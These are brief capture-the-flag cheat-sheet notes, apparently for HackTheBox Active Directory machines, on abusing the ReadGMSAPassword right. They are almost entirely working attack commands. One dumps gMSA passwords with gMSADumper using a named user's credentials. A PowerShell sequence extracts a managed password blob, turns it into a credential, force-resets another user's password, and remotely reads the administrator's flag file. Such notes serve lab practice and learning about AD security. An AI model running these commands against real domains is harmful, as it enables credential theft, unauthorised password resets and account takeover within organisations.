ReadGSMAPassword

dosudo git clone https://github.com/micahvandeusen/gMSADumper python3 gMSADumper.py -u 'ted.graves' -p 'Mr.Teddy' -l dc -d intelligence.htb

Powershell

$mp=(get-adserviceaccount bir-adfs-gmsa -properties msDS-ManagedPassword).'msDS-managedpassword'
$password = (convertfrom-admanagedpasswordblob $mp).SecureCurrentPassword
$Cred = New-Object System.Management.Automation.PSCredential('search\BIR-ADFS-GMSA$', $password)
Set-ADAccountPassword -Identity 'tristan.davies' -Reset -NewPassword (ConvertTo-SecureString -AsPlainText "Password123!" -Force) -credential $cred

Invoke-command -computername 127.0.0.1 -scriptblock {cat c:\users\administrator\desktop\root.txt} -Credential $Cred